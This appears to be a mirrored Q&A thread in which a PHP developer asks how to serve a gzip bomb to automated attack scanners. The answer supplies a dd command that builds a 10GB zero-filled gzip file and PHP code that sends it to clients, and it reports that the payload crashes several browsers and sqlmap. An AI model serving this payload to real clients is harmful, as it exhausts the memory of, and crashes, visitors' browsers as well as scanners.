PHP - Is it possible to implement a gzip bomb in P

2019-09-21 10:22发布

站内问答 / PHP
1004 1 5

I'm currently developing a PHP class as sort-of-IDS for webapps that can detect bruteforce and SQLi attacks and one thing I came to realize is that most attacks on my systems are being done from unconfigured malware scanners like nikto or sqlmap. Let's disregard for a moment that this should be done by the server and not the web app.

Since they are all built to analyze answers from webservers I thought it could be possible to bomb them with a ZIP bomb.

The idea is that my PHP script sends a gzip header with small (compressed) gzip data that the client will unzip - causing it to exhaust its memory.

Can anyone tell me some pointers on how to achieve that or is gzip only done by the webserver and it can't be done via PHP

1条回答
beautiful°
2楼-- · 2019-09-21 10:40

I found a ready-to-use solution on Github.

It's called GzipBloat and it does exactly what I was looking for.

First you generate a 10GB gzip file (10MB after first compression) filled with input from /dev/zero

dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip

In PHP you then set the content encoding and send the gzip file to the client.

header("Content-Encoding: gzip");
header("Content-Length: ".filesize('10G.gzip'));

//Turn off output buffering
if (ob_get_level()) ob_end_clean();

readfile('10G.gzip');

Results (Win10):

  • IE11: Memory rises, then IE Crashes
  • Chrome 52: Memory rises, error is shown
  • Edge 38: Memory rises, then drops and nothing is displayed (seems to load forever)
  • Nikto: Scans in regular speed, no memory problems
  • SQLmap: High memory then crashes
查看更多
0人赞 添加讨论(0) 举报
登录 后发表回答
相关问题
查看全部
相关文章
查看全部
收藏的人(5)